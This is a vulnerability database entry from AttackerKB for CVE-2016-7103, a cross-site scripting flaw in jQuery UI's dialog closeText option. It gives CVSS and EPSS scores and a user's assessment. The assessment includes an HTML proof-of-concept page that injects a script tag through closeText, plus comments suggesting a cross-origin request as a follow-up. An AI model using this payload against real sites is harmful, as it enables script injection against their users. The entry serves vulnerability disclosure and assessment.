Lucene search

K
attackerkbAttackerKBAKB:8878CC0F-8F42-41CD-B190-6AAC449597D7
HistoryMar 15, 2017 - 12:00 a.m.

CVE-2016-7103

2017-03-1500:00:00
attackerkb.com
97

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

4.3 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

0.005 Low

EPSS

Percentile

72.8%

Cross-site scripting (XSS) vulnerability in jQuery UI before 1.12.0 might allow remote attackers to inject arbitrary web script or HTML via the closeText parameter of the dialog function.

Recent assessments:

djsubstance at February 24, 2021 8:16pm UTC reported:

PoC:

<!DOCTYPE html>
&lt;html xmlns="http://www.w3.org/1999/xhtml"&gt;
&lt;head&gt;

&lt;title&gt;XSS in closeText option of component ui dialog&lt;/title&gt;

&lt;script src="https://code.jquery.com/jquery-2.1.4.js"&gt;&lt;/script&gt;
&lt;script src="https://code.jquery.com/ui/1.11.4/jquery-ui.js"&gt;&lt;/script&gt;
&lt;link rel="stylesheet" type="text/css" href="http://code.jquery.com/ui/1.9.1/themes/base/jquery-ui.css"&gt;


&lt;script&gt;

$(document).ready(function ()

   {
    $('#dialog').dialog({ closeText: '&lt;script&gt;alert("XSS")&lt;\/script&gt;' });      // This is the attack point where you can inject code 

// if the CORS/CSP policy is not configured or setup wrong, try an jQuery vuln using $.ajax(’https://www.msn.com/robots.txt’);
// if it says onready:1 expand it you should see msn.com’s robots file
// this is a doublewammy of vulnerability in the target

   }
                );
&lt;/script&gt;

&lt;/head&gt;
&lt;body&gt;

<div>Content here!</div>

&lt;/body&gt;
&lt;/html&gt;

Positives: Easy, can potentially execute scripts off remote sites
Negatives: Would likely require user intervention social engineer or phishing to make this persistant or of real use

Document on how the dialog function is used in jQuery – <https://www.tutorialspoint.com/jqueryui/jqueryui_dialog.htm&gt;

Here is a link to a site that will prove which jquery exploits are vuln. to which version (specific to jQuery not UI) – <https://research.insecurelabs.org/jquery/test/&gt;
More info on exploit and poc: <https://vuldb.com/?id.98137&gt;

dj substance
<https://tranceattic.com>

Assessed Attacker Value: 2
Assessed Attacker Value: 2Assessed Attacker Value: 4

References

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

4.3 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

0.005 Low

EPSS

Percentile

72.8%